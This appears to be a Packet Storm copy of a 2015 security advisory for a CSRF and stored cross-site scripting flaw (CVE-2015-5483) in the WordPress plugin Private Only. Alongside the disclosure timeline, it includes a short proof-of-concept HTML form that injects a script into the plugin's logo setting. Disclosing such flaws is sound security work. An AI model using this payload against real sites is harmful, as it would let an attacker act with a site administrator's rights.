Lucene search

K
packetstormTom AdamsPACKETSTORM:133349
HistoryAug 27, 2015 - 12:00 a.m.

WordPress Private Only 3.5.1 CSRF / Cross Site Scripting

2015-08-2700:00:00
Tom Adams
packetstormsecurity.com
27

EPSS

0.016

Percentile

87.6%

`Details  
================  
Software: Private Only  
Version: 3.5.1  
Homepage: http://wordpress.org/plugins/private-only/  
Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerability-in-private-only-could-allow-an-attacker-to-do-almost-anything-an-admin-user-can/  
CVE: CVE-2015-5483  
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)  
  
Description  
================  
CSRF/XSS vulnerability in Private Only could allow an attacker to do almost anything an admin user can  
  
Vulnerability  
================  
This plugin fails to use CSRF and XSS prevention techniques which are available in WordPress (nonces, and esc_attr()) so it allows an attacker to cause a logged in admin user to be the victim of a CSRF attack which stores malicious content in the database which, due to lack of escaping, is output as raw HTML. Via JavaScript the attacker is able to cause the user’s browser to do almost anything including add users, delete posts, and even modify PHP files if that option hasn’t been disabled.  
  
Proof of concept  
================  
Pressing the submit button here will change the logo setting to contain some JavaScript. Browsers with no reflected XSS prevention (like Firefox) will execute the JavaScript immediately, other browsers will execute the JavaScript when the page is loaded next.  
<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=privateonly.php\">  
<input type=\"text\" name=\"po_logo\" value=\""><script>alert(1)</script>\">  
<input type=\"text\" name=\"po_submit\" value=\"Y\">  
<input type=\"submit\">  
</form>  
  
Mitigations  
================  
  
Disclosure policy  
================  
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/  
  
Please contact us on [email protected] to acknowledge this report if you received it via a third party (for example, [email protected]) as they generally cannot communicate with us on your behalf.  
  
This vulnerability will be published if we do not receive a response to this report with 14 days.  
  
Timeline  
================  
  
2015-03-20: Discovered  
2015-07-09: Reported to vendor by email  
2015-07-09: Requested CVE  
2015-07-31: No reply. Tried on twitter and got a brief response  
2015-08-18: After multiple further attempts, still no reply. Escalating to WP Plugins  
  
  
  
Discovered by dxw:  
================  
Tom Adams  
Please visit security.dxw.com for more information.  
  
  
  
  
`

EPSS

0.016

Percentile

87.6%

Related for PACKETSTORM:133349